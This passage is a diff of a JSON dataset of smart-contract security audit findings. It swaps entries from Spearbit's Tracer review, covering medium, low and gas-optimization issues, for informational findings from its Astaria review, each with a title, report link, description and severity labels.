} }", + "title": "Document why bytes4(0xffffffff) is chosen when CollateralToken acting as a Seaport zone to signal invalid orders", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "bytes4(0xffffffff) to indicate a Seaport order using this zone is not a valid order.", "labels": [ "Spearbit", - "Tracer", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Pools can be deployed with malicious or incorrect quote tokens and oracles", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The deployment of a pool via deployPool() is permissionless. The deployer provides several pa- rameters that have to be trusted by the users of a specific pool, these parameters include: oracleWrapper settlementEthOracle quoteToken invariantCheck If any one of them is malicious, then the pool and its value will be affected. Note: Separate findings are made for the deployer check (issue Authenticity check for oracles is not effective) and the invariantCheck (issue Two different invariantCheck variables used in PoolFactory.deployPool() ).", + "title": "CollateralToken.onERC721Received's use of depositFor stack variable is redundant", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "If we follow the logic of assigning values to depositFor in CollateralToken.onERC721Received, we notice that it will end up being from_. So its usage is redundant.", "labels": [ "Spearbit", - "Tracer", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "pairTokenBase and poolBase template contracts instances are not initialized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The constructor of PoolFactory contract creates three template contract instances but only one is initialized: poolCommitterBase. The other two contract instances (pairTokenBase and poolBase) are not initial- ized. contract PoolFactory is IPoolFactory, Ownable { constructor(address _feeReceiver) { ... PoolToken pairTokenBase = new PoolToken(DEFAULT_NUM_DECIMALS); // not initialized pairTokenBaseAddress = address(pairTokenBase); LeveragedPool poolBase = new LeveragedPool(); // not initialized poolBaseAddress = address(poolBase); PoolCommitter poolCommitterBase = new PoolCommitter(); // is initialized poolCommitterBaseAddress = address(poolCommitterBase); ... /* initialise base PoolCommitter template (with dummy values) */ poolCommitterBase.initialize(address(this), address(this), address(this), owner(), 0, 0, 0); } This means an attacker can initialize the templates setting them as the owner, and perform owner actions on contracts such as minting tokens. This can be misleading for users of the protocol as these minted tokens seem to be valid tokens. In PoolToken.initialize() an attacker can become the owner by calling initialize() with an address under his control as a parameter. The same can happen in LeveragedPool.initialize() with the initialization parameter. 13 contract PoolToken is ERC20_Cloneable, IPoolToken { ... } contract ERC20_Cloneable is ERC20, Initializable { function initialize(address _pool, ) external initializer { // not called for the template contract owner = _pool; ... 
} } contract LeveragedPool is ILeveragedPool, Initializable, IPausable { function initialize(ILeveragedPool.Initialization calldata initialization) external override initializer { // not called for the template contract ... // set the owner of the pool. This is governance when deployed from the factory governance = initialization._owner; } }", + "title": "onlyOwner modifier can be defined to simplify the codebase", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "releaseToAddress checks whether the msg.sender is an owner of a collateral. CollateralToken already has a modifier onlyOwner(...), so the initial check in releaseToAddress can be delegated to the modifier.", "labels": [ "Spearbit", - "Tracer", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Oracles are not updated before use", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The PoolKeeper contract uses two oracles but does not ensure that their prices are updated. The poll() function should be called on both oracles to get the first execution and the settlement / ETH prices. As it currently is, the code could operate on old data.", + "title": "Document liquidator's role for the protocol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When a lien's term ends (stack.point.end <= block.timestamp), anyone can call liquidate on AstariaRouter. There is no restriction on the msg.sender. The msg.sender will be set as the liquidator, and: if the Seaport auction ends (3 days currently, set by the protocol), they can call liquidatorNFTClaim to claim the NFT; or, if the Seaport auction settles, the liquidator receives the liquidation fee.", "labels": [ "Spearbit", - "Tracer", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "getPendingCommits() underreports commits", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "When frontRunningInterval > updateInterval, the PoolCommitter.getAppropriateUpdateIntervalId() function can return updateInterval IDs that are arbitrarily far into the future, especially if appropriateIntervalId > updateIntervalId + 1. Therefore, commits can also be made to these appropriate interval IDs far in the future by calling commit(). The PoolCommitter.getPendingCommits() function only checks the commits for updateIntervalId and updateIntervalId + 1, but needs to check up to updateIntervalId + factorDifference + 1. Currently, it is underreporting the pending commits, which leads to the checkInvariants function not checking the correct values.", + "title": "Until ASTARIA_ROUTER gets filed for CollateralToken, CollateralToken cannot receive ERC721s safely.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "ASTARIA_ROUTER is not set in the CollateralToken's constructor.
So until an authorized entity files for it, CollateralToken is unable to safely receive an ERC721 token (whenNotPaused and onERC721Received would revert).", "labels": [ "Spearbit", - "Tracer", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Authenticity check for oracles is not effective", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The deployPool() function verifies the authenticity of the oracleWrapper by calling its deployer() function. As the oracleWrapper is supplied via deploymentParameters, it can be a malicious contract whose deployer() function can return any value, including msg.sender. Note: this check does protect against frontrunning the deployment transaction of the same pool. See Undocumented frontrunning protection. function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) { ... require(IOracleWrapper(deploymentParameters.oracleWrapper).deployer() == msg.sender, \"Deployer must be oracle wrapper owner\");", + "title": "_getMaxPotentialDebtForCollateral might have been meant to be an internal function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "_getMaxPotentialDebtForCollateral is defined as a public function, yet its name starts with an underscore, which by convention is usually used for internal or private functions.", "labels": [ "Spearbit", - "Tracer", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Incorrect calculation of keeper reward", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The keeper reward is calculated as (keeperGas * tipPercent / 100) / 1e18. The division by 1e18 is incorrect and undervalues the reward for the keeper. The tip part of the keeper reward is essentially ignored. The likely cause of this miscalculation is based on the note at PoolKeeper.sol#L244, which states the tip percent is in WAD units, but it really is a quad representation of a value in the range between 5 and 100. The comment at PoolKeeper.sol#L241 also incorrectly states that _keeperGas is in wei (usually referring to ETH), which is not the case as it is denominated in the quote token, but in WAD precision.", + "title": "return keyword can be removed from stopLiens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "_stopLiens does not return any values, but in stopLiens the return statement is used along with the non-existent return value of _stopLiens.", "labels": [ "Spearbit", - "Tracer", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "performUpkeepSinglePool() can result in a griefing attack when the pool has not been updated for many intervals", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "Assuming the pool has not been updated for many update intervals, performUpkeepSinglePool() can call poolUpkeep() repeatedly with _boundedIntervals == true and a bounded amount of gas to fix this situation. This in turn will call executeCommitments() repeatedly. For each call to executeCommitments() the updateMintingFee() function will be called. This updates fees and changes them in an unexpected way.
A griefing attack is possible by repeatedly calling executeCommitments() with boundedIntervals == true and numberOfIntervals == 0. Note: Also see issue It is not possible to call executeCommitments() for multiple old commits. It is also important that lastPriceTimestamp is only updated after the last executeCommitments(), otherwise it will revert. function executeCommitments(bool boundedIntervals, uint256 numberOfIntervals) external override onlyPool { ... uint256 upperBound = boundedIntervals ? numberOfIntervals : type(uint256).max; ... while (i < upperBound) { if (block.timestamp >= lastPriceTimestamp + updateInterval * counter) { // lastPriceTimestamp shouldn't be updated too soon ... } } ... updateMintingFee(); // should do this once (in combination with _boundedIntervals==true) ... }", + "title": "LienToken's constructor does not set ASTARIA_ROUTER which makes some of the endpoints non-functional", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "LienToken's constructor does not set ASTARIA_ROUTER. That means until an authorized entity calls file to set this parameter, the following functions would be broken/revert: buyoutLien, _buyoutLien, _payDebt, getBuyout, _getBuyout, _isPublicVault, setPayee (partially broken), _paymentAH, payDebtViaClearingHouse", "labels": [ "Spearbit", - "Tracer", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "It is not possible to call executeCommitments() for multiple old commits", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "Assuming the pool has not been updated for many update intervals, performUpkeepSinglePool() can call poolUpkeep() repeatedly with _boundedIntervals == true and a bounded amount of gas to fix this situation. In this context the following problem occurs: In the first run of poolUpkeep(), lastPriceTimestamp will be set to block.timestamp. In the next run of poolUpkeep(), processing will stop at require(intervalPassed(),..), because block.timestamp hasn't increased. This means the rest of the commitments won't be executed by executeCommitments() and updateIntervalId, which is updated in executeCommitments(), will start lagging. function poolUpkeep(..., bool _boundedIntervals, uint256 _numberOfIntervals) external override onlyKeeper { require(intervalPassed(), \"Update interval hasn't passed\"); // next time lastPriceTimestamp == block.timestamp executePriceChange(_oldPrice, _newPrice); // should only do this once (in combination with _boundedIntervals==true) IPoolCommitter(poolCommitter).executeCommitments(_boundedIntervals, _numberOfIntervals); lastPriceTimestamp = block.timestamp; // shouldn't update until all executeCommitments() are processed } function intervalPassed() public view override returns (bool) { unchecked { return block.timestamp >= lastPriceTimestamp + updateInterval; } } }", + "title": "Document the approval process for a user's CollateralToken before calling commitToLiens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In _executeCommitment's return statement: IVaultImplementation(c.lienRequest.strategy.vault).commitToLien( c, address(this) ); address(this) is the AstariaRouter.
The call here to commitToLien enters into _validateCommitment with AstariaRouter as the receiver, and so for it to not revert, the holder would need to have set approval for the router beforehand: CT.isApprovedForAll(holder, receiver) // needs to be true", "labels": [ "Spearbit", - "Tracer", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Incorrect comparison in getUpdatedAggregateBalance()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "When the value of data.updateIntervalId accidentally happens to be larger than data.currentUpdateIntervalId in the getUpdatedAggregateBalance() function, it will execute the rest of the function, which shouldn't happen. Although this is unlikely, it is also very easy to prevent. function getUpdatedAggregateBalance(UpdateData calldata data) external pure returns (...) { if (data.updateIntervalId == data.currentUpdateIntervalId) { // Update interval has not passed: No change return (0, 0, 0, 0, 0); } }", + "title": "isValidRefinance's return statement can be reformatted", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Currently, it is a bit hard to read the return statement of isValidRefinance.", "labels": [ "Spearbit", - "Tracer", - "Severity: Low Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "updateAggregateBalance() can run out of gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The updateAggregateBalance() function of the PoolCommitter contract contains a for loop that, in theory, could use up all the gas and result in a revert. The updateAggregateBalance() function checks all future intervals every time it is called and adds them back to the unAggregatedCommitments array, which is checked in the next function call. This would only be a problem if frontRunningInterval is much larger than updateInterval, a situation that seems unlikely in practice. function updateAggregateBalance(address user) public override checkInvariantsAfterFunction { ... uint256[] memory currentIntervalIds = unAggregatedCommitments[user]; uint256 unAggregatedLength = currentIntervalIds.length; for (uint256 i = 0; i < unAggregatedLength; i++) { uint256 id = currentIntervalIds[i]; ... UserCommitment memory commitment = userCommitments[user][id]; ... if (commitment.updateIntervalId < updateIntervalId) { ... } else { ... storageArrayPlaceHolder.push(currentIntervalIds[i]); // entry for future intervals stays in array } } delete unAggregatedCommitments[user]; unAggregatedCommitments[user] = storageArrayPlaceHolder; ... }", + "title": "Withdraw Reserves should always be transferred before Commit to Lien", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When a new lien is requested, the _beforeCommitToLien() function is called. If the epoch is over, this calls processEpoch(). Otherwise, it calls transferWithdrawReserve(). function _beforeCommitToLien( IAstariaRouter.Commitment calldata params, address receiver ) internal virtual override(VaultImplementation) { VaultData storage s = _loadStorageSlot(); if (timeToEpochEnd() == uint256(0)) { processEpoch(); } else if (s.withdrawReserve > uint256(0)) { transferWithdrawReserve(); } } However, the processEpoch() function will fail if the withdraw reserves haven't been transferred.
In this case, it would require the user to manually call transferWithdrawReserve() to fix things, and then request their lien again. Instead, the protocol should transfer the reserves whenever needed, and only then call processEpoch().", "labels": [ "Spearbit", - "Tracer", - "Severity: Low Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Pool information might be lost if setFactory() of PoolKeeper contract is called", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The PoolKeeper contract has a function to change the factory: setFactory(). However, calling this function will make previous pools inaccessible for this PoolKeeper unless the new factory imports the pools from the old factory. The isUpkeepRequiredSinglePool() function calls factory.isValidPool(_pool), and it will fail because the new factory doesn't know about the old pools. As this call is essential for upkeeping, the entire upkeep mechanism will fail. function setFactory(address _factory) external override onlyOwner { factory = IPoolFactory(_factory); ... } function isUpkeepRequiredSinglePool(address _pool) public view override returns (bool) { if (!factory.isValidPool(_pool)) { // might not work if factory is changed return false; } ... }", + "title": "Remove owner() variable from withdraw proxies", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When a withdrawProxy is deployed, it is created with certain immutable arguments. Two of these values are owner() and vault(), and they will always be equal. They seem to be used interchangeably on the withdraw proxy itself, so they should be consolidated into one variable.", "labels": [ "Spearbit", - "Tracer", - "Severity: Low Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Ether could be lost when calling commit()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The commit() function sends the supplied ETH to makePaidClaimRequest() only if payForClaim == true. If the caller of commit() accidentally sends ETH when payForClaim == false, then the ETH stays in the PoolCommitter contract and is effectively lost. Note: This was also documented in Secureum's CARE report. function commit(...) external payable override checkInvariantsAfterFunction { ... if (payForClaim) { autoClaim.makePaidClaimRequest{value: msg.value}(msg.sender); } }", + "title": "Unnecessary checks in _validateCommitment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In _validateCommitment(), we check to confirm that the sender of the message is adequately qualified to be making the decision to take a lien against the collateral (i.e. they are the holder, the operator, etc.). However, the way this is checked is somewhat roundabout and can be substantially simplified.
For example, we check require(operator == receiver); in a block that is only triggered if we've already validated that receiver != operator.", "labels": [ "Spearbit", - "Tracer", - "Severity: Low Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Race condition if PoolFactory deploys pools before fees are set", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The deployPool function of the PoolFactory contract can deploy pools before the changeInterval value and minting and burning fees are set. This means that fees would not be subtracted. The exact boundaries for the mintingFee, burningFee and changeInterval values aren't clear. In some parts of the code < 1e18 is used, and in other parts <= 1e18. Furthermore, the initialize() function of the PoolCommitter contract doesn't check the value of changeInterval. The setBurningFee(), setMintingFee() and setChangeInterval() functions of the PoolCommitter contract don't check the new values. Finally, two representations of 1e18 are used: 1e18 and PoolSwapLibrary.WAD_PRECISION. contract PoolFactory is IPoolFactory, Ownable { function setMintAndBurnFeeAndChangeInterval(uint256 _mintingFee, uint256 _burningFee,...) ... { ... require(_mintingFee <= 1e18, \"Fee cannot be > 100%\"); require(_burningFee <= 1e18, \"Fee cannot be > 100%\"); require(_changeInterval <= 1e18, \"Change interval cannot be > 100%\"); mintingFee = _mintingFee; burningFee = _burningFee; changeInterval = _changeInterval; ... } function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) { ... // no check that mintingFee, burningFee, changeInterval are set poolCommitter.initialize(..., mintingFee, burningFee, changeInterval, ...); } } contract PoolCommitter is IPoolCommitter, Initializable { function initialize(... ,uint256 _mintingFee, uint256 _burningFee,... ) ... { ... require(_mintingFee < PoolSwapLibrary.WAD_PRECISION, \"Minting fee >= 100%\"); require(_burningFee < PoolSwapLibrary.WAD_PRECISION, \"Burning fee >= 100%\"); ... // no check on _changeInterval mintingFee = PoolSwapLibrary.convertUIntToDecimal(_mintingFee); burningFee = PoolSwapLibrary.convertUIntToDecimal(_burningFee); changeInterval = PoolSwapLibrary.convertUIntToDecimal(_changeInterval); ... } function setBurningFee(uint256 _burningFee) external override onlyGov { burningFee = PoolSwapLibrary.convertUIntToDecimal(_burningFee); // no check on _burningFee ... } function setMintingFee(uint256 _mintingFee) external override onlyGov { mintingFee = PoolSwapLibrary.convertUIntToDecimal(_mintingFee); // no check on _mintingFee ... } function setChangeInterval(uint256 _changeInterval) external override onlyGov { changeInterval = PoolSwapLibrary.convertUIntToDecimal(_changeInterval); // no check on _changeInterval ... } function updateMintingFee(bytes16 longTokenPrice, bytes16 shortTokenPrice) private { ... if (PoolSwapLibrary.compareDecimals(mintingFee, MAX_MINTING_FEE) == 1) { // mintingFee is greater than 1 (100%). // We want to cap this at a theoretical max of 100% mintingFee = MAX_MINTING_FEE; // so mintingFee is allowed to be 1e18 } } }", + "title": "Comment or remove unused function parameters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Highlighted functions above take arguments which are never used. If the function has to have a particular signature, comment that argument name; otherwise remove that argument completely.
Additional instances noted in Context above. LienToken.sol#L726 : LienStorage storage s input parameter is not used in _getRemainingInterest. It can be removed and this function can be pure. VaultImplementation.sol#L341 : incoming is not used in buyoutLien; was this variable meant to be used?", "labels": [ "Spearbit", - "Tracer", - "Severity: Low Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Committer not validated on withdraw claim and multi-paid claim", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "AutoClaim checks that the committer creating the claim request in makePaidClaimRequest and withdrawing the claim request in withdrawUserClaimRequest is a valid committer for the PoolFactory used in the AutoClaim initializer. The same security check should be done in all the other functions where the committer is passed as a function parameter.", + "title": "Zero address check can never fail", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The details.borrower != address(0) check will never be false in the current system as AstariaRouter.sol#L352-L354 will revert when ownerOf is address(0).", "labels": [ "Spearbit", - "Tracer", - "Severity: Low Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Some SMAOracle and AutoClaim state variables can be declared as immutable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "In the SMAOracle contract, the oracle, periods, observer, scaler and updateInterval state variables are not declared as immutable. In the AutoClaim contract, the poolFactory state variable is not declared as immutable. Since the mentioned variables are only initialized in the contracts' constructors, they can be declared as immutable in order to save gas.", + "title": "UX differs between Router.commitToLiens and VaultImplementation.commitToLien", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The Router function creates the Collateralized Token, while the VaultImplementation requires the collateral owner to call ERC721.safeTransferFrom to the CollateralToken contract prior to calling.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Use of counters can be optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "counter and i are both used as counters for the same loop. uint32 counter = 1; uint256 i = 0; ... while (i < upperBound) { ... unchecked { counter += 1; } i++; }", + "title": "Document what vaults are listed by Astaria", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Anyone can call newPublicVault with epochLength in the correct range to create a public vault.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "transferOwnership() function is inaccessible", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The ERC20_Cloneable contract contains a transferOwnership() function that may only be called by the owner, which is PoolFactory.
However, PoolFactory doesn't call the function, so it is essentially dead code, making the deployment cost unnecessary additional gas. function transferOwnership(address _owner) external onlyOwner { require(_owner != address(0), \"Owner: setting to 0 address\"); owner = _owner; }", + "title": "Simplify nested if/else blocks in for loops", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "There are quite a few instances where nested if/else blocks are used in for loops and are the only block in the for loop. for ( ... ) { if (...) { ... } else if (...) { ... } ... else if (...) { ... } else { revert CustomError(); } }", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Use cached values when present", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The updateAggregateBalance() function creates a temporary variable id with the value currentIntervalIds[i]. Immediately after that, currentIntervalIds[i] is used again. This could be replaced by id to save gas. function updateAggregateBalance(address user) public override checkInvariantsAfterFunction { ... for (uint256 i = 0; i < unAggregatedLength; i++) { uint256 id = currentIntervalIds[i]; if (currentIntervalIds[i] == 0) { // could use id continue; }", + "title": "Document the role guardian plays in the protocol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The role of guardian is not documented.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "_invariantCheckContract stored twice", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "Both the PoolCommitter and LeveragedPool contracts store the value of _invariantCheckContract twice, both in invariantCheckContract and invariantCheck. This is not necessary and costs extra gas. contract PoolCommitter is IPoolCommitter, Initializable { ... address public invariantCheckContract; IInvariantCheck public invariantCheck; ... function initialize( ..., address _invariantCheckContract, ... ) external override initializer { ... invariantCheckContract = _invariantCheckContract; invariantCheck = IInvariantCheck(_invariantCheckContract); ... } } contract LeveragedPool is ILeveragedPool, Initializable, IPausable { ... address public invariantCheckContract; IInvariantCheck public invariantCheck; ... function initialize(ILeveragedPool.Initialization calldata initialization) external override initializer { ... invariantCheckContract = initialization._invariantCheckContract; invariantCheck = IInvariantCheck(initialization._invariantCheckContract); } }", + "title": "strategistFee... variables are not used and can be removed from the codebase", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "strategistFeeNumerator and strategistFeeDenominator are not used except in getStrategistFee (which itself also has not been referred to by other contracts).
It looks like these have been replaced by the vault fee, which gets set by public vault owners when they create the vault.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Unnecessary if/else statement in LeveragedPool", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "A boolean variable is used to indicate the type of token to mint. The if/else statement can be avoided by using LONG_INDEX or SHORT_INDEX as the parameter instead of a bool to indicate the use of the long or short token. uint256 public constant LONG_INDEX = 0; uint256 public constant SHORT_INDEX = 1; ... function mintTokens(bool isLongToken,...){ if (isLongToken) { IPoolToken(tokens[LONG_INDEX]).mint(...); } else { IPoolToken(tokens[SHORT_INDEX]).mint(...); ...", + "title": "redeemFutureEpoch can be called directly from a public vault to avoid using the endpoint from AstariaRouter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "One can call the redeemFutureEpoch endpoint of the vault directly to avoid the extra gas of juggling assets and multiple contract calls when using the endpoint from AstariaRouter.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Uncached array length used in loop", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The users array length is used in a for loop condition; therefore the length of the array is evaluated in every loop iteration. Evaluating it once and caching it can save gas. for (uint256 i; i < users.length; i++) { ... }", + "title": "Remove unused imports", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "If an imported file is not used, it can be removed. LienToken.sol#L24 : since Base64 is only imported in this file, if not used it can be removed from the codebase.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Unnecessary deletion of array elements in a loop is expensive", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The unAggregatedCommitments[user] array is deleted after the for loop in updateAggregateBalance. Therefore, deleting the array elements one by one with delete unAggregatedCommitments[user][i]; in the loop body costs unnecessary gas.", + "title": "Reduce nesting by reverting early", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Code following this pattern: if (condition) { ... } else { revert(); } can be simplified to remove nesting using custom errors: if (!condition) { revert(); } or, if using require statements, it can be transformed into: require(condition)", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Zero-value transfers are allowed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "Given that claim() can return 0 when the claim isn't valid yet due to updateInterval, the return value should be checked to avoid doing an unnecessary sendValue() call with amount 0.
Address.sendValue( payable(msg.sender), claim(user, poolCommitterAddress, poolCommitter, currentUpdateIntervalId) );", + "title": "assembly can read constant global variables", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Yul cannot read global variables, but that is not true for a constant variable as its value is embedded in the bytecode. For instance, the highlighted code above has the following pattern: bytes32 slot = WITHDRAW_PROXY_SLOT; assembly { s.slot := slot } Here, WITHDRAW_PROXY_SLOT is a constant which can be used directly in assembly code.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Unneeded onlyUnpaused modifier in setQuoteAndPool()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The setQuoteAndPool() function is only callable once, from the factory contract during deployment, due to the onlyFactory modifier. During this call, the contract is always unpaused; therefore the onlyUnpaused modifier is not necessary.", + "title": "Revert with error messages", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "There are many instances of require and revert statements being used without an accompanying error message. Error messages are useful for unit tests to ensure that a call reverted due to the intended reason, and they help in identifying the root cause.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Unnecessary mapping access in AutoClaim.makePaidClaimRequest()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "Resolving mappings consumes more gas than directly accessing the storage struct; therefore it's more gas-efficient to use the already de-referenced variable than to resolve the mapping again. function makePaidClaimRequest(address user) external payable override onlyPoolCommitter { ClaimRequest storage request = claimRequests[user][msg.sender]; ... uint256 reward = claimRequests[user][msg.sender].reward; ... claimRequests[user][msg.sender].updateIntervalId = requestUpdateIntervalId; claimRequests[user][msg.sender].reward = msg.value;", + "title": "Mixed use of require and revert", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The Astaria codebase uses a mix of require and revert statements. We suggest following only one of these ways to do a conditional revert, for standardization.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Function complexity can be reduced from linear to constant by rewriting loops", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The add() function of the PriceObserver contract shifts an entire array if the buffer is full, and the SMA() function of the SMAOracle contract sums the values of an array to calculate its average. Both of these functions have O(n) complexity and could be rewritten to have O(1) complexity. This would save gas and possibly increase the buffer size. contract PriceObserver is Ownable, IPriceObserver { ...
